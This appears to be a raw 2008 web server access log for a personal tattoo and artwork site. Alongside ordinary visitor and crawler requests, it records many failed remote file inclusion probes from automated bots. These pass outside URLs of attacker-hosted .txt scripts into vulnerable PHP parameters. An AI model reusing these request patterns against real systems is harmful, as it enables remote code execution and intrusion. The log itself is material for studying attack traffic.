202.221.143.111 - - [08/Jun/2008:16:48:31 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
74.200.201.194 - - [08/Jun/2008:16:49:32 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
74.200.201.194 - - [08/Jun/2008:16:49:32 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
64.202.117.159 - - [08/Jun/2008:16:49:40 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
64.202.117.159 - - [08/Jun/2008:16:49:40 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
207.218.234.146 - - [08/Jun/2008:16:50:18 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.218.234.146 - - [08/Jun/2008:16:50:19 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.218.234.146 - - [08/Jun/2008:16:50:19 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.218.234.146 - - [08/Jun/2008:16:50:19 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.227.65.79 - - [08/Jun/2008:16:50:20 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 316 "-""Microsoft Pocket Internet Explorer/0.6"
212.227.65.79 - - [08/Jun/2008:16:50:20 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 321 "-""Microsoft Pocket Internet Explorer/0.6"
72.18.155.74 - - [08/Jun/2008:16:51:08 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
72.18.155.74 - - [08/Jun/2008:16:51:13 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
201.25.155.27 - - [08/Jun/2008:16:51:30 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
201.25.155.27 - - [08/Jun/2008:16:51:34 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
128.2.220.167 - - [08/Jun/2008:16:53:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""PrivacyFinder/1.1"
128.2.220.167 - - [08/Jun/2008:16:53:01 -0500] "GET / HTTP/1.1" 200 1243 "-""PrivacyFinder/1.1"
128.2.220.167 - - [08/Jun/2008:16:53:01 -0500] "GET /w3c/p3p.xml HTTP/1.1" 404 295 "-""PrivacyFinder/1.1"
89.111.173.115 - - [08/Jun/2008:16:54:15 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.173.115 - - [08/Jun/2008:16:54:15 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.17.101.27 - - [08/Jun/2008:16:54:44 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.17.101.27 - - [08/Jun/2008:16:54:45 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
65.214.44.28 - - [08/Jun/2008:16:55:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [08/Jun/2008:16:55:51 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
64.136.58.116 - - [08/Jun/2008:16:57:51 -0500] "GET /logs/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.136.58.116 - - [08/Jun/2008:16:57:51 -0500] "GET /config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.98.220 - - [08/Jun/2008:16:58:53 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.63.220.22 - - [08/Jun/2008:16:59:19 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
212.63.220.22 - - [08/Jun/2008:16:59:19 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
74.53.240.146 - - [08/Jun/2008:17:00:01 -0500] "GET /logs/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.240.146 - - [08/Jun/2008:17:00:01 -0500] "GET /config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.157.211.204 - - [08/Jun/2008:17:00:53 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
200.157.211.204 - - [08/Jun/2008:17:00:53 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
89.241.157.32 - - [08/Jun/2008:17:01:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:22 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:22 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:30 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:31 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:31 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
89.241.157.32 - - [08/Jun/2008:17:01:31 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.200.201.194 - - [08/Jun/2008:17:01:33 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
74.200.201.194 - - [08/Jun/2008:17:01:33 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.202.117.159 - - [08/Jun/2008:17:01:41 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
64.202.117.159 - - [08/Jun/2008:17:01:42 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
124.136.39.87 - - [08/Jun/2008:17:01:49 -0500] "GET /logs/access_log.1208649600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
124.136.39.87 - - [08/Jun/2008:17:01:49 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
124.136.39.87 - - [08/Jun/2008:17:01:50 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
124.136.39.87 - - [08/Jun/2008:17:02:14 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
213.194.149.215 - - [08/Jun/2008:17:02:21 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
213.194.149.215 - - [08/Jun/2008:17:02:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
217.75.193.70 - - [08/Jun/2008:17:04:33 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
217.75.193.70 - - [08/Jun/2008:17:04:33 -0500] "GET //becommunity/community/index.php?pageurl=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
89.218.85.18 - - [08/Jun/2008:17:05:25 -0500] "GET /logs//editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:05:26 -0500] "GET //editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:17:05:28 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:17:05:28 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
76.76.8.197 - - [08/Jun/2008:17:05:31 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
76.76.8.197 - - [08/Jun/2008:17:05:31 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
201.235.253.29 - - [08/Jun/2008:17:06:14 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://super4host.com/gha-id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
201.235.253.29 - - [08/Jun/2008:17:06:15 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://super4host.com/gha-id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
193.232.11.93 - - [08/Jun/2008:17:07:33 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.140.19.142 - - [08/Jun/2008:17:08:04 -0500] "GET /logs//editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:17:08:04 -0500] "GET //editor2/spaw_control.class.php?spaw_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.76"
89.218.85.18 - - [08/Jun/2008:17:08:52 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:17:08:52 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.6.22.166 - - [08/Jun/2008:17:11:06 -0500] "GET /artwork/carousel.htm HTTP/1.0" 200 814 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
189.33.245.95 - - [08/Jun/2008:17:14:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://images.google.com.br/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=228&w=271&sz=17&hl=pt-BR&start=4&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dearl%2Bbrown%2Btattoo%26gbv%3D2%26hl%3Dpt-BR""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:19 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:48 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:48 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:49 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:49 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:49 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:50 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:50 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:50 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:50 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:50 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:14:52 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:31 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:31 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:31 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:32 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:32 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:32 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:33 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:33 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:33 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:33 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:35 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:46 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:46 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:46 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:47 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:16:48 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:42 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:43 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:43 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:43 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:43 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:17:44 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.34.226.62 - - [08/Jun/2008:17:18:20 -0500] "GET /logs/access_log.1208649600/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
72.34.226.62 - - [08/Jun/2008:17:18:20 -0500] "GET /config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.34.226.62 - - [08/Jun/2008:17:18:20 -0500] "GET /logs/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
72.34.226.62 - - [08/Jun/2008:17:18:39 -0500] "GET /logs/access_log.1181952000/config.php?path[docroot]=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
189.33.245.95 - - [08/Jun/2008:17:18:48 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:18:48 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:18:48 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.33.245.95 - - [08/Jun/2008:17:18:49 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.22.166 - - [08/Jun/2008:17:21:15 -0500] "GET /logs/access_log.1172620800 HTTP/1.0" 200 112092 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.135 - - [08/Jun/2008:17:22:23 -0500] "GET /logs/access_log.1206748800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
